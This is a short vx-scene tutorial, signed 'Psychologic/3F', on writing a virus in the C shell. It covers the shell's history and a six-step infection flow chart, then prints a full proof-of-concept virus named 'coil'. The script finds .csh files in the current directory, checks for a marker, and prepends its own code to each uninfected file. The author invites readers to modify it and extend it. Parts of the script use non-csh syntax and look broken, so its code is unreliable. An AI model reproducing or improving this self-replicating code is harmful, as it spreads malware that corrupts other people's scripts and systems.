CSH virus.. 

.Author Notes

Viruses are lame thing,  it won't give you any benefit in your real life
everybody hates virus. So don't code virus if you don't have something new
in it. It just wasting your time, and your time can be converted to money

.About C Shell

The C shell (csh or the improved version, tcsh, on most machines) is a Unix shell that was created
by Bill Joy while a graduate student at University of California, Berkeley in the late 1970s. It has
been distributed widely, beginning with the 2BSD release of the BSD Unix system that Joy began 
distributing in 1978. Other early contributors to the ideas or the code were Michael Ubell, 
Eric Allman, Mike O'Brien and Jim Kulp.

.Can we write virus in C Shell ?

Ofcourse yes, 100% competible to code C Shell virus 

.How ?

Before you ask me how, you should know this standard procedure virus flow chart :

1. Virus read its own entrypoint (body)
2. Virus search the victim, will not infect if already marked
3. Virus open the victim and drop its body to the victim
4. Virus give a mark to the victim and close the victim
5. Virus loop to search another victim
6. Go to step 2 till there is no victim

I don't have much time to code another csh function, so I just copy-paste from Coil
coil will run under unix and windows

here the proof of concept code
------------------------------------------------------------------------code cut
#!/bin/csh

proc coil()							# only procedure
        foreach file ($cwd/*.csh)				# search *.csh files in current directory
                set mark = ("`grep -c 'coil' $file`")		# set up the mark
                if ($mark=='0') then				# check the mark in each file
			cat $file>temp				# copy host body to temp
                        cat $0>$file				# overwrite each *.csh with coil entrypoint
			cat temp>>$file				# put the the original host code
                end
        end
rm temp								# remove temp
end
echo Just another proof of concept virus by Psychologic/3F
coil								# run coil
----------------------------------------------------------------------code cut

Lot of cool thing can be done by CSH virus, just try to modify my code,and mail me if you
have a problem with the code

.Psychologic/3F